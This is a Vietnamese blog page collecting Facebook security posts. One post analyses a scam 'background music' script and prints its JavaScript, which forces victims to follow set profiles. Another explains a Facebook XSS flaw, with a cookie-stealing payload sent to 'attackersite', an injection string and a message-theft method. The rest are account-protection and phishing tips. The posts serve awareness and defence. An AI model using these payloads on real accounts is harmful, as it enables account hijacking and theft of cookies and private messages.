Trang

Hiển thị các bài đăng có nhãn FaceBook. Hiển thị tất cả bài đăng
Hiển thị các bài đăng có nhãn FaceBook. Hiển thị tất cả bài đăng

Thực hư chức năng chèn nhạc nền vào trang cá nhân Facebook?

Chào các bạn!

Dạo gần đây có khá nhiều tài khoản Facebook có đăng 1 status hoặc spam comment vào status của các bạn với nội dung đại loại như sau:


01

Những status như này thường đánh vào tâm lý tò mò, "ham của lạ" của các bạn (ai mà không muốn trang cá nhân mình đặc biệt hơn của người khác khi có thêm nhạc nền chứ, đúng không :D).



Đây là hình ảnh kèm theo status như để chứng minh:
998567_509983169081386_1940742347_n

Nhưng đừng vội "nhẹ dạ cả tin" khi thấy những status như này. Chúng ta cùng bắt tay vào phân tích status này nhé :)
  • Giả sử như Facebook có thêm chức năng này thật thì cũng sử dụng player của Facebook, tại sao trong hình "demo" lại là player của Zing Mp3 (trang nghe nhạc trực tuyến tại Việt Nam???).
  • Điểm nghi ngờ thứ hai là trong hình "demo" không có phần Tiêu đề khung (chính là tên của khung, ví dụ như: Thông tin, Album Ảnh, Bạn bè,...). mà chỉ có phần player?
Phân tích liên kết tại Bước 1 trong status, thường thì những status như này thường dẫn bạn tới 1 link có dạng như sau:
http://pastebin.com/raw.php?i=ID
02

Trong đó thì ID là 1 đoạn code ngẫu nhiên khi tạo 1 trang paste mới tại Pastebin.
Pastebin là một ứng dụng web cho phép bất cứ ai cũng có thể lưu trữ văn bản trong một thời gian nhất định. Website này chủ yếu được sử dụng bởi các lập trình viên để lưu trữ những mã nguồn hay thông tin cấu hình, nhưng về cơ bản thì bất cứ ai cũng có thể chia sẻ.
Tiếp tục phân tích đoạn mã được chia sẻ bằng Pastebin:
- Đoạn mã sử dụng ngôn ngữ Javascript.
- Khi làm theo các bước hướng dẫn để có thể sử dụng chức năng "nhạc nền" như status kia nói thì đoạn JS (Javascript) này sẽ hiện 1 hộp thông báo (theo mình để gây thêm sự chú ý hoặc đánh lạc hướng người sử dụng):
alert('XONG! NHẤN ENTER ĐỂ HOÀN TẤT QUÁ TRÌNH UPDATE PLUGIN FACEBOOK. CHÚC CÁC BẠN ONLINE VUI VẺ CẢm ON BẠN ÐÃ SỬ DỤNG CODE CỦA CHÚNG TÔI HTTPS://FACEBOOK.COM');
- Sử dụng tiếp một hàm được gọi là "a" gửi truy vấn bằng ajax tới "/ajax/follow/follow_profile.php?__a=1" để tự động theo dõi những ID của những User được chỉ định sẵn:
function a(abone){
    var http4 = new XMLHttpRequest();
     
    var url4 = "/ajax/follow/follow_profile.php?__a=1";
     
    var params4 = "profile_id=" + abone + "&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg=" + fb_dtsg + "&lsd&__" + user_id + "&phstamp=";
    http4.open("POST", url4, true);
     
    //Send the proper header information along with the request
    http4.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    http4.setRequestHeader("Content-length", params4.length);
    http4.setRequestHeader("Connection", "close");
     
    http4.onreadystatechange = function() {//Call a function when the state changes.
    if(http4.readyState == 4 && http4.status == 200) {
       
      http4.close; // Close the connection
     
    }
    }
    
    http4.send(params4);
}

Danh sách những ID mà bạn sẽ bị "ép theo dõi":
03

- Làm sao để biết bạn đã bị ép theo dõi ai? Rất đơn giản, lấy số ID trong danh sách kia và truy cập:
https://www.facebook.com/ID
Ví dụ: Hàm đầu tiên gọi tới ID này:
a("100003217938743");
Thì bạn kiểm tra bằng cách vào liên kết sau:
 https://www.facebook.com/100003217938743
Facebook sẽ tự trỏ ID tới Username của him ý :))
04
https://www.facebook.com/liushishi.10.3.1987 (Đang được theo dõi bởi 130.784 người)
Giờ thì mình đã hiểu tại sao sub nhiều thế? :(
OK, tương tự với các ID khác, các bạn tự truy ra nhé :D

* Làm sao để kiểm tra? Rất đơn giản. Các bạn có thể tự kiểm tra như sau:
  • Hủy theo dõi user đó.
  • Làm theo các bước hướng dẫn để "chèn nhạc nền".
  • F5 lại trang cá nhân của user đó và xem nút Theo dõi có trở thành "Đang theo dõi" hay không? Nếu có thì bạn đã hiểu những gì mình vừa nói :).
* Còn vài hàm nữa thực hiện add bạn bè vào group, theo dõi list sub, đăng tin nhắn lên page nhưng mình không thấy được gọi tới.

Tóm lại là cả đoạn mã JS này không có một chỗ nào thêm chức năng "nhạc nền" vào trang cá nhân cho bạn cả mà chỉ bắt bạn theo dõi user linh tinh :). Hãy nhanh chóng tìm những ID mà bạn đã bị "ép theo dõi" và hủy theo dõi nhé ;). Đừng quên chia sẻ bài viết này cho bạn bè cùng biết (share lên Facebook càng tốt ^^).

* Link đoạn Javascript mà mình phân tích trong bài này: http://pastebin.com/raw.php?i=hex65K0s
Dành cho những bạn muốn phân tích thêm, chứ đừng lấy mà chạy thử nha!
Nguồn : Junookyo Blog's 

Xem Thêm

 

Bảo vệ tối ưu cho tài khoản Facebook

Để bảo mật quyền riêng tư của người dùng trên Facebook, người dùng có thể tham khảo một số cách làm dưới đây để bảo đảm an toàn cho trang mạng xã hội của mình trong năm mới. Bạn có thể theo dõi các lần đăng nhập vào trang Facebook của mình qua email, tin nhắn hoặc sử dụng kết nối SSL để bảo vệ tài khoản.

Dưới đây là các cách bảo vệ tài khoản Facebook của chúng tôi:

Thay đổi mật khẩu định kỳ

[Hình: facebook11.jpg]

Cách đơn giản nhất là người dùng thường xuyên thay đổi định kỳ mật khẩu tài khoản của mình nhưng đừng đặt quá đơn giản sẽ dễ dàng bị hacker đánh cắp. Một mật khẩu đủ mạnh phải bao gồm: chữ, số, ký tự đặc biệt, chữ viết hoa và có độ dài hơn 8 ký tự. Ví dụ: TeSt@123@tSeT

Để thay đổi mật khẩu bạn làm như sau: "Account settings > General > Password". Sau khi đổi lại mật khẩu mới, chọn Save changes.

Thay đổi câu trả lời bí mật

Người dùng không nên chọn những câu hỏi bí mật như: Bạn sinh ra ở đâu? Tên một người bạn thân?... Những thông tin này có thể bị các hacker dễ dàng tìm ra khi truy cập vào Facebook của bạn.

Vì vậy, nên chọn những câu hỏi bí mật có tính chất ngẫu nhiên, mang những thông tin mà khó có thể đoán được. Ví dụ: Bạn thích chơi game gì nhất? Câu trả lời: Football Manager hoặc Call of Duty.

Để thay đổi câu trả lời bí mật, bạn làm như sau: "Account settings > Security > Security Question", sau đó nhập mật khẩu để lưu thay đổi, cuối cùng chọn Save Changes.

Đăng nhập tài khoản Facebook bằng cách xác nhận SMS

[Hình: facebook33.jpg]

Có thể lựa chọn một cách đăng nhập an toàn hơn đó là xác nhận qua SMS. Cứ mỗi lần đăng nhập Facebook trên một máy tính lạ, Facebook sẽ gửi một tin nhắn trong đó có mã xác nhận về số điện thoại mà người dùng đã đăng ký để nhận trước đó. Điều này chỉ xảy ra một lần mỗi khi bạn dùng máy tính hoặc điện thoại lạ để đăng nhập vào tài khoản Facebook của mình.

Để bật chức năng này, làm như sau: "Account settings > Security > Login Approvals". Sau đó, người dùng cung cấp số điện thoại nhận tin nhắn theo chỉ dẫn.

Gửi email thông báo mỗi lần đăng nhập

[Hình: facebook44.jpg]

Bạn chọn "Account settings > Security > Login notifications", tích vào mục Email rồi kết thúc bằng phím Save Changes.

Sử dụng kết nối SSL (Secure Sockets Layer) cho Facebook

[Hình: facebook3.jpg]

Ngoài 4 cách do trên, bạn cũng có thể sử dụng kết nối SSL để bảo vệ tài khoản Facebook. Kết nối này giúp nâng cáo cơ chế bảo mật cho website của bạn.

Để sử dụng kết nối SSL chọn "Account settings > Security > Secure Browsing", tiếp tục tích vào mục Browse Facebook on a secure connection (https) when possible, kết thúc bằng phím Save Changes.

Xem Thêm

 

Khai thác lỗ hổng XSS/CSS trên Facebook

Cross Site Scripting (còn được gọi là XSS hay CSS) là một trong những kỹ thuật tấn công tầng ứng dụng (L7) phổ biến nhất.

Thông thường, hầu hết kiểu khai thác Cross-Site Scripting đều liên quan đến việc gửi cookie của nạn nhân tới máy của kẻ tấn công thông qua Javascript.



<script>
document.write("<img src='http://attackersite/a.gif?x=" + escape(document.cookie + "'>")
</script>[/i]
Trong khi khai thác lỗ hổng Cross-Site Scripting, kẻ tấn công sẽ không dựa vào cookie mà chúng đánh cắp được, mà attacker có thể tiêm code Javascript vào website của nạn nhân. Attacker cũng có thể thực hiện các hành động nguy hiểm khác.

xssattack

Trong trường hợp đối với Fb, quá trình được diễn ra như sau:

1. Đọc messages cá nhân của nạn nhân.
2. Lấy và chỉnh sửa ảnh cá nhân của nạn nhân.
3. Gửi thông điệp tới những contacts của nạn nhân.
4. Thêm những ứng dụng Facebook mới.
5. Đánh cắp contacts.

Mô tả chi tiết khai thác lỗ hổng Cross-Site Scripting trên Fb.

Facebook sử dụng PHP scripts. Scripts này đã bị khai thác từ tháng 7/2010. http://www.facebook....ve_uploader.php

Script chứa những thông số khác nhau, một trong số chúng - controller_id: đầu vào trực tiếp bên trong của một thẻ script của người dùng. Vd: http://www.facebook....0&post_upload=1

HTML body mà chúng ta cần quan tâm:

<script>
...
onloadRegister(function (){window.parent.__UIControllerRegistry["c4c288b438ed080"].saveUploadedImage("whatever", "whatever", 90, 60, 80);});
...
</script>

Bạn sẽ nhận thấy rằng giá trị controller_id (c4c288b438ed080) được viết trực tiếp bên trong đoạn Javascript của trang HTML. Bằng cách chèn double quote, attacker có khả năng thoát khỏi chuỗi key của array và chèn  Javascript trực tiếp bên trong một trang facebook.com, thay đổi thông số controller_id dễ dàng:

controller_id=test”]}; alert(“facebook test”); //

Điều này làm thay đổi nội dung sau:

<script>
...
onloadRegister(function (){window.parent.__UIControllerRegistry["test"]}; alert("facebook test"); //"].saveUploadedImage("whatever", "whatever", 90, 60, 80);});
...
</script>

Nội dung này sẽ chạy alert box:

facebook_xss

Ở giai đoạn này attacker cần phải làm là đọc nội dung JSON giống như client-side scripts của Fb.

Cách thức khai thác lỗ hổng XSS để chiếm tài khoản Fb

Để đạt được mục đích này, attacker có thể gọi file mở rộng .js trên Web Server của anh ta để add thêm nhiều code.  Số frameworks giúp chuyên gia bảo mật hoặc attacker khai thác lỗ hổng CSS, giống như BeEF.

Trong TH này, chúng ta sẽ tùy biến code để chỉ định những tính năng nào được hiển thị.

Javascript code hướng dẫn web browser của nạn nhân đọc danh sách private messages tìm thấy trên http://www.facebook..../home/inbox.php. Code phân tích từng ID message. Với mỗi message, Javascript code của attacker sẽ đọc được message http://www.facebook..../ReadThread.php.

Cuối cùng, attacker có thể nhận được nội dung message trực tiếp từ máy chủ web server của anh ta.

Trong đoạn video dưới đây, chúng ta sẽ thấy cách thức attacker gửi nội dung nhạy cảm của victim thông qua Facebook chat.


Tham khảo thêm tại:

[1] - http://www.acunetix....e-scripting.htm
[i][2] - http://www.acunetix....ss-facebook.htm


Nguồn: Bảo Mật Hệ Thống.

Xem Thêm

 

Cảnh báo: Phising email lừa gạt cư dân Facebook

Phishing email là loại email trá hình nhằm lừa gạt người sử dụng. Trong nhiều trường hợp đường dẫn tin tặc cung cấp chứa đầy vi rút.

Đây là một ví dụ gần đây, tin tặc tìm cách lừa gạt cư dân Facebook.

[Hình: Screen-Shot-2012-12-20-at-12.53.18-PM.png]


Khi nhận được email bên dưới và mới đọc thoáng qua, chúng ta nghĩ là Facebook thông báo cho biết tài khoản Facebook của mình đã bị khóa lại. Do đó phải bấm vô đường dẫn trong email để xác nhận.

Tuy nhiên nếu xem kỹ lại thì

1. Hàng From: tuy đề là Facebook.Team nhưng địa chỉ lại là @blackswantribe.com.au. Rõ ràng đây là email giả mạo rồi.

2. Đường dẫn (URL) trong email nhìn thì thấy là http://www.facebook.com, nhưng nếu nhấp chuột (đừng bấm chuột) vào thì địa chỉ thật sự hiện ra lại là http://datingcool-2013.info/.....

Do đó bạn đừng bao giờ vội bấm vào bất cứ đường dẫn nào trong một email dù là khả nghi hay là có vẻ như đến từ người quen. Phải phối kiểm lại cho kỹ. Nếu không chắc, không thấy an tâm thì tốt nhất chúng ta lờ đi.

Trong trường hợp này, thay vì bấm vào đường dẫn, bạn kiểm tra bằng cách đăng nhập Facebook như thường lệ. Nếu vẫn đăng nhập bình thường, thì đây rõ ràng là email giả mạo.

Xem Thêm

 

Facebook sửa lỗi bypass Password

Facebook vừa sửa lỗ hổng bảo mật vào cuối tuần qua và cho rằng nó có thể bị khai thác và có thể có trên 1 triệu tài khoản sẽ bị đăng nhập trái phép nếu không xác thực kịp thời


Trong tuần này Facebook đã vô hiệu hóa lỗ hổng mà có thể cho phép các hacker truy cập vào tài khoản người dùng mà không cần mật khẩu.
Các Hacker đã phát hiện ra lỗ hổng này của Facebook và được đăng lên vào thứ 6 vừa qua.
Theo tin tức của các Hacker. Các lỗ hổng được tập trung vào các Email từ mạng xã hội có chưa các liên kết độc hại. Khi người dùng Click vào link đó và các hacker có thể đăng nhập vào tài khoản email mà không cần dùng password hay qua một bước xác thực nào cả. Theo các thông kê tìm kiếm trên google thì có khả năng 1,3 triệu người sử dụng có khả năng dính lỗ hổng này.
Cũng như các liên kết mà có thể phơi bày các tài khoản Facebook để đăng nhập trái phép, truy vấn tìm kiếm cũng cho thấy địa chỉ e-mail liên kết với các tài khoản.Các truy vấn tìm kiếm đã tìm thấy các liên kết – chỉ là tạm thời và sẽ hết hiệu lực khi người dùng dự định nhấp vào chúng – kể từ đó đã bị vô hiệu hóa bởi Google và không hiển thị bất kỳ kết quả nào.
Kỹ sư Matt Jones của Facebook nói trên trang Hacker News  rằng Facebook không chia sẻ các liên kết. “Chúng tôi chỉ gửi các URL đến địa chỉ e-mail của chủ tài khoản để dễ dàng sử dụng và không bao giờ làm cho họ công bố công khai Thậm chí sau đó, chúng tôi đặt bảo vệ tại chỗ để làm giảm khả năng mà bất cứ ai khác có thể nhấp chuột vào các tài khoản.”
“Đối với một công cụ tìm kiếm để đi qua những liên kết này, nội dung của e-mail sẽ cần phải đã được đăng trực tuyến (ví dụ như thông qua các trang web email throwaway, như ai đó chỉ ra – hoặc những người có địa chỉ e-mail đi để gửi email danh sách với trực tuyến lưu trữ), ” ông nói thêm.
Hệ thống bảo mật của Facebook cũng chạy “kiểm tra bổ sung để đảm bảo rằng nó trông giống như chủ sở hữu tài khoản của những người đăng nhập vào”, theo Jones.
Hầu hết các liên kết trong các kết quả tìm kiếm đã có thể đã hết hạn, và Kể từ đó, Facebook đã vô hiệu hóa các tính năng cho thời gian, các kỹ sư cho biết.
“Bất kể, do một số những liên kết này bị tiết lộ, chúng tôi đã bật tính năng cho đến khi chúng tôi tốt hơn có thể bảo đảm an toàn cho người sử dụng e-mail nội dung hiển thị công khai. Chúng tôi cũng đảm bảo tài khoản của bất cứ ai đăng nhập thông qua hệ thống kiểm tra độ an toàn của facebook. “

Xem Thêm

 

Cách nhận biết tài khoản Gmail, Yahoo, FB bị người khác sử dụng

Việc bảo mật các thông tin và tài khoản cá nhân khi sử dụng internet luôn là vấn đề được coi trọng. Tuy nhiên đôi khi vì nhiều lý do nào đó, các tài khoản Gmail, Yahoo hay Facebook của bạn bị lộ mật khẩu và bị một kẻ lạ mặt ghé thăm, tuy nhiên không để lộ dấu vết gì. Nếu may mắn bạn hoàn toàn có thể kịp thời phát hiện và ngăn chặn các hành vi đăng nhập trái phép này. Chỉ với một vài thủ thuật nhỏ, bạn có thể phát hiện có người đã sử dụng tài khoản Gmail, Yahoo hay Facebook của mình.

Gmail
Đăng nhập vào tài khoản Gmail của bạn, kéo xuống dưới cùng và để ý dòng Hoạt động tài khoản gần đây nhất (Last account activity). Hãy click vào mục Chi tiết (Details).

Một danh sách hoạt động tài khoản Gmail của bạn sẽ được hiển thị, bao gồm cả thời gian và địa chỉ IP đăng nhập. Do đó, bạn có thể dễ dàng phát hiện nếu có ai đó sử dụng máy tính khác để đăng nhập vào tài khoản Gmail của bạn. Tuy nhiên nếu bạn không chắc chắn rằng mình có sử dụng máy tính khác để đăng nhập tài khoản Gmail hay không, bạn có thể chọn Đăng xuất tất cả các phiên bản (Sign out all other sessions) và thay đổi mật khẩu để đảm bảo an toàn.

Yahoo
Để theo dõi các hoạt động của bạn trong tài khoản Yahoo! Mail, bạn chỉ cần đăng nhập vào tài khoản Yahoo Mail, click vào tên đăng nhập của bạn ở góc trên bên trái và chọn mục Thông tin tài khoản (Account Information). Bạn sẽ phải đăng nhập một lần nữa để đến trang thông tin cá nhân của mình.

Tại đây, kéo xuống mục Đăng nhập và bảo mật (Sign-In and Security) và chọn Xem hoạt động đăng nhập gần đây (View your recent sign-in activity). Tại đây bạn cũng có thể xem danh sách các hoạt động đăng nhập vào tài khoản Yahoo của bạn theo thời gian và địa chỉ IP, hiển thị cả hoạt động đăng nhập vào Yahoo Mail và Yaho Messenger.

Facebook
Trong tài khoản Facebook của bạn, click vào mũi tên bên cạnh tên tài khoản và chọn mục Account Settings, tiếp tục chọn Security, trong danh sách bên phải chọn Edit của mục Active Sessions.

Tại đây sẽ hiển thị danh sách các lần đăng nhập tài khoản Facebook của bạn theo thời gian và địa chỉ, bạn có thể chỉ chuột vào địa chỉ bên cạnh Location để xem IP đăng nhập. Bạn cũng có thể chọn End Activity để đăng xuất tài khoản từ các địa chỉ khác.

Nguồn genk.vn

Xem Thêm

 

Copyright © Dương-UG Blog's - Nguyễn Bình Dương